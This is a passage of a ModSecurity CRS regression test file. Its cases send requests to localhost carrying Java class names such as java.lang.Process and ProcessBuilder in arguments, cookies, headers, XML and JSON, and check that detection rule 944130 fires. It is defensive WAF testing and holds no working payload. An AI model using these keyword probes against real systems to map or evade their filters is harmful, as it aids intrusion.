Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.Integer\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-285 - desc: "Content-Type application/json arg name includes keyword java.lang.Integer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.lang.Integer\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-286 - desc: "Argument test includes keyword java.lang.Number" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.lang.Number" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-287 - desc: "Argument name includes keyword java.lang.Number" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.Number=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-288 - desc: "Cookie test includes keyword java.lang.Number" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.Number - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-289 - desc: "Cookie name includes keyword java.lang.Number" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.Number=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-290 - desc: "Request header test includes keyword java.lang.Number" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.Number - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-291 - desc: "XML attribute value includes keyword java.lang.Number" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-292 - desc: "XML element value includes keyword java.lang.Number" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.Number" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-293 - desc: "Nested XML element value includes keyword java.lang.Number" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: 
"ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.Number" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-294 - desc: "Content-Type text/plain includes keyword java.lang.Number" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.lang.Number" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-295 - desc: "Content-Type application/json arg value includes keyword java.lang.Number" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.Number\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-296 - desc: "Content-Type application/json arg name includes keyword java.lang.Number" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - 
Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.lang.Number\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-297 - desc: "Argument test includes keyword java.lang.Object" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.lang.Object" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-298 - desc: "Argument name includes keyword java.lang.Object" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.Object=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-299 - desc: "Cookie test includes keyword java.lang.Object" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.Object - method: "POST" - version: "HTTP/1.0" - data: 
"test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-300 - desc: "Cookie name includes keyword java.lang.Object" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.Object=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-301 - desc: "Request header test includes keyword java.lang.Object" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.Object - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-302 - desc: "XML attribute value includes keyword java.lang.Object" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-303 - desc: "XML 
element value includes keyword java.lang.Object" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.Object" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-304 - desc: "Nested XML element value includes keyword java.lang.Object" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.Object" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-305 - desc: "Content-Type text/plain includes keyword java.lang.Object" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.lang.Object" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-306 - desc: "Content-Type application/json arg value includes keyword java.lang.Object" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: 
"localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.Object\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-307 - desc: "Content-Type application/json arg name includes keyword java.lang.Object" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.lang.Object\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-308 - desc: "Argument test includes keyword java.lang.Process" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.lang.Process" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-309 - desc: "Argument name includes keyword java.lang.Process" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.Process=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-310 - desc: "Cookie test includes keyword java.lang.Process" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.Process - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-311 - desc: "Cookie name includes keyword java.lang.Process" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.Process=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-312 - desc: "Request header test includes keyword java.lang.Process" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.Process - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-313 - desc: "XML attribute value includes keyword java.lang.Process" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-314 - desc: "XML element value includes keyword java.lang.Process" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.Process" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-315 - desc: "Nested XML element value includes keyword java.lang.Process" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: 
"ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.Process" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-316 - desc: "Content-Type text/plain includes keyword java.lang.Process" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.lang.Process" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-317 - desc: "Content-Type application/json arg value includes keyword java.lang.Process" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.Process\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-318 - desc: "Content-Type application/json arg name includes keyword java.lang.Process" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - 
Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.lang.Process\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-319 - desc: "Argument test includes keyword java.lang.ProcessBuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.lang.ProcessBuilder" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-320 - desc: "Argument name includes keyword java.lang.ProcessBuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.ProcessBuilder=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-321 - desc: "Cookie test includes keyword java.lang.ProcessBuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.ProcessBuilder 
- method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-322 - desc: "Cookie name includes keyword java.lang.ProcessBuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.ProcessBuilder=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-323 - desc: "Request header test includes keyword java.lang.ProcessBuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.ProcessBuilder - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-324 - desc: "XML attribute value includes keyword java.lang.ProcessBuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - 
output: - log_contains: "id \"944130\"" - - - - test_title: 944130-325 - desc: "XML element value includes keyword java.lang.ProcessBuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.ProcessBuilder" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-326 - desc: "Nested XML element value includes keyword java.lang.ProcessBuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.ProcessBuilder" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-327 - desc: "Content-Type text/plain includes keyword java.lang.ProcessBuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.lang.ProcessBuilder" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-328 - desc: "Content-Type application/json arg 
value includes keyword java.lang.ProcessBuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.ProcessBuilder\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-329 - desc: "Content-Type application/json arg name includes keyword java.lang.ProcessBuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.lang.ProcessBuilder\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-330 - desc: "Argument test includes keyword java.lang.reflect" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 